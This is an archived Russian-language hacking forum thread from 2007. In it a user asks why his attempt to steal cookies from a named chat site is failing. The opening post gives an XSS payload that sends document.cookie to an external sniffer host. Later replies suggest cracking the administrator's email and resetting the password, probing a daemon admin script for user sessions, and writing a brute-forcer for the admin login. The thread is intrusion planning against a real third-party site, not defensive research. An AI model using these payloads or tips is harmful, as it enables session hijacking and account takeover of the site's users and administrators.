Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Что я делаю не так? (https://forum.antichat.xyz/showthread.php?t=32318)

Illidan 29.01.2007 18:40
Что я делаю не так?
 
Здравствуйте, я хочу украсть куки с чата (http://home.onego.ru/~smokie_chat/chat/), разобрался я вроде бы с XSS, со снифферами, нашёл на сайт ачата какой XSS используется в voodoo (?url=javascript:alert(/Tested%20by%20qBiN/);)
Сниффер использую http://xtoolz.hut1.ru/cgi-bin/x/xsave.gif
В итоге получилось у меня вот такая вещь http://home.onego.ru/~smokie_chat/chat/?url=javascript:document.location="http://xtoolz.hut1.ru/cgi-bin/x/xsave.gif"+document.cookie;
Но куки всё равно в логах не выдаёт((((
Что же я делаю не так?! И может ли это быть связано с тем, что сервер находится на провайдере onego.ru?
Или может я ошибку допускаю? :confused:

Illidan 29.01.2007 21:33
Ну помогите пожалуйста, кто чем может.....

goodkit 29.01.2007 23:14
А чё ето за чат-то?? ) Лучше бы подумал как chat.karelia.info паламадь!

Illidan 31.01.2007 19:54
Помогите кто чем может....(((

ice1k 31.01.2007 20:00
Ты где там xss то вообще нашёл ? ;) =)

Illidan 31.01.2007 23:17
http://home.onego.ru/~smokie_chat/chat/go.php?url=javascript:alert()
Д-к вот он...алерт выскакивает, как и должно быть в XSS...или я не прав?

_Great_ 31.01.2007 23:22
лол. ну-ну

Kaban 31.01.2007 23:42
у тебя наврят ли что-нить получится с xss.
ломай мыло админа и восстановливай пароль.

Illidan 01.02.2007 00:26
Ок, но обьясните чё не так-то? Ведь в это статье написано мол в вудувских чатах это XSS http://forum.antichat.ru/thread20985.html

KREST 02.02.2007 01:04
Проги найди и инфу про взломы почитай(Фак),мож с хss че и получиться....

Illidan 02.02.2007 13:54
Д-к перечитал уже много чего (и не только на ачате), теории в голове много, а вот на практике жопа какая-то выходит((( Мож видео есть у кого по взлому вуду, или ссылки?

n3r0bi0m4n 21.02.2007 02:24
VooDoo Engine, дабы такие "хитрые" личности как ты не 3,14здили куки делает вот что:

тыкая на каждую ссылку где-нибудь внутри чата, она загружается в переменную "url" скрипта go.php ИЗ КОТОРОГО уже перемещает на нужную страницу. Собственно ничего сильно интересного не передается :)

у мну вышли только: дизайн, имя юзера и еще какая-то чушь ... но я не особо старался, так что... пробуй и может получится что-нибудь...

кстати, если чат на демоне - лезь в /cgi-bin/daemon_admin.pl (если его не переименовали)

там все сесси пользователей (втч и админов) но ничего сверхполезного это ТОЖЕ не даст.

тебе как минимум нужен пасс от site/chat/admin/

вооо-оот там уже можно что-нибудь накосячить...
пиши брут для admin/index.php || admin/configure.php

зы: сырцы на vochat.com

DRON-ANARCHY 23.02.2007 00:16
в ентом go.php вырезается такая выжная хрень как %22
без нее даже алерт не выскочит, т.к. все останется в теге


Время: 09:16